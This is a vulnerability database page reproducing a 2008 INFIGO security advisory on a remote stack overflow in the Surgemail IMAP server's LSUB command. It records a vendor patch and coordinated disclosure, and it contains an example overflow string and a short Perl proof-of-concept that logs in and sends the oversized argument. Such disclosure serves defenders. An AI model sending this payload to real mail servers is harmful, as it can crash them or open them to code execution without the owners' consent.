Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

INFIGO-2008-03-07.txt

🗓️ 21 Mar 2008 00:00:00Reported by Leon JuranicType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 16 Views

Surgemail 38k4 IMAP server remote stack overflow advisory with remote code execution vulnerability, impacting latest available version and PoC exploit. Vendor released patch available

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`   
INFIGO IS Security Advisory #ADV-2008-03-07  
http://www.infigo.hr/en/  
  
  
  
  
Title: Surgemail 38k4 IMAP server remote stack overflow  
Advisory ID: INFIGO-2008-03-07  
Date: 2008-03-21  
Advisory URL: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-03-07  
Impact: Remote code execution  
Risk Level: High  
Vulnerability Type: Remote  
  
  
  
  
==[ Overview  
  
SurgeMail Mail Server Software Suite - combines advanced features, high  
performance and ease of use. Works on Windows, UNIX (Linux, Solaris etc.),  
Mac OSX, FreeBSD and others. Surgemail integrated email server is an  
Antispam Server, Antivirus Server, Webmail Server, Groupware Server,   
Blog Server and much more.   
  
  
  
==[ Vulnerability  
  
A remote vanilla stack overflow vulnerability exists in the Surgemail IMAP   
server. The vulnerability is caused due to a boundary error in the IMAP   
server, when processing overly long arguments of the 'LSUB' command.  
The vulnerability results in a simple stack overflow condition that can be  
trivially exploited.  
  
Example:  
a002 LSUB "//AA:" * 12000 + " " + "//AA:" * 21000 + "\r\n"  
  
  
  
==[ Affected Version  
  
The vulnerability has been identified in the latest available 38k4-4.   
It was tested on Windows XP SP2.  
  
  
  
==[ Fix  
  
The vendor released a new version that fixes the vulnerability available at  
http://www.netwinsite.com/surgemail/.  
  
  
  
==[ PoC Exploit  
  
http://www.infigo.hr/files/surgemail.pl  
  
#  
#  
# Surgemail stack overflow PoC exploit - latest version  
# Coded by Leon Juranic <[email protected]>  
# http://www.infigo.hr/en/  
#  
  
use IO::Socket;  
  
  
$host = "192.168.0.15";  
$user = "test";  
$pass = "test";  
$str = "//AA:";  
  
$sock = IO::Socket::INET->new(PeerAddr => $host,  
PeerPort => "143",  
Proto => "tcp") || die ("Cannot connect!!!\n");  
  
print $a = <$sock>;  
print $sock "a001 LOGIN $user $pass\r\n";  
print $a = <$sock>;  
print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";  
print $a = <$sock>;  
  
  
  
==[ Vendor status  
  
01.09.2008 - Initial contact  
01.10.2008 - Initial vendor response  
03.19.2008 - Vendor status update - Patch available  
03.21.2008 - Coordinated public disclosure  
  
  
  
==[ Credits  
  
Vulnerability discovered by Leon Juranic <[email protected]>.  
  
  
  
==[ INFIGO IS Security Contact  
  
INFIGO IS,  
  
WWW : http://www.infigo.hr/en/  
E-mail : [email protected]  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
21 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
surgemail serverremote code executionstack overflowvulnerabilitypatchpoc exploitinfigo is
16
.json
Report